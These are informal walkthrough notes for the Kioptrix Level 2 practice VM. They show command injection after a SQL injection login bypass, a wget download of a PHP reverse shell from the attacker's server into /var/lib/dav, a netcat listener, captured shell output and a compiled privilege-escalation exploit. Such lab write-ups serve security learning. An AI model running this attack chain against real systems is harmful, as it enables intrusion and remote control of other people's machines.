Kioptrix-2 Walkthrough / Notes
basic sql injections gets you in..
using a semi colon ';' finishes the last connection and allows for the next command.
; ls -la
; cd /usr/ && ls -la
so we can string commands together using '&&' as per usual from the shell.
we setup a python http server on port 4444 from the directory where the 'php-reverse-shell' resides from pentest monkey.
(we cant use b374k as we cant access the file directly form the URL)
we port forward port 4444 from any IP to our local machine LAN address.
Now we change the IP address in php-reverse-shell to be our public IP and port 4444
next we upload the phpfile - but we cant because we dont have permission in the current directory.
so we find a directory we can write to.
ok so we now we are the user apache
lets now see what directories are owned by apache
;find / -user apache
/var/cache/mod_proxy /var/cache/mod_ssl /var/lib/dav
ok so the directory "/var/lib/dav" looks like a good place to upload our reverse-shell
next we cd into the directory and upload out shell
;cd /var/lib/dav && /usr/bin/wget PUBLIC-IP:4444/php-reverse-shell.php
at the same time make sure youre http server is runnign and in the directory where the php-reverse-shell file resides
#python -m SimpleHTTPServer 4444
Serving HTTP on 0.0.0.0 port 4444 ... 126.96.36.199 - - [19/Sep/2017 17:55:13] "GET /php-reverse-shell.php HTTP/1.0" 200 -
Awesome! out file has been uploaded to the server. lets confirm
;ls -la /var/lib/dev
We should see the file...
Next we need to make sure the file has permission to be executed.
;chmod 777 /var/lib/dev/php-reverse-shell
And now we have a listener setup on the sending box. (seems backwards...)
;nc -v -n -l -p 4444
ok now we execute the php file, as we cant browse to it we use the 'php' command
And we should get the shell
listening on [any] 4444 ... connect to [192.168.0.100] from (UNKNOWN) [188.8.131.52] 32800 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux 17:10:07 up 3:41, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) sh: no job control in this shell sh-3.00$
Priv escalation spoiler
#gcc -o 9542 9542.c && ./9542
Output to Web Browser
Content-type: text/html X-Powered-By: PHP/4.3.9 Content-type: text/html X-Powered-By: PHP/4.3.9 Successfully opened reverse shell to 184.108.40.206:4444 ERROR: Shell connection terminated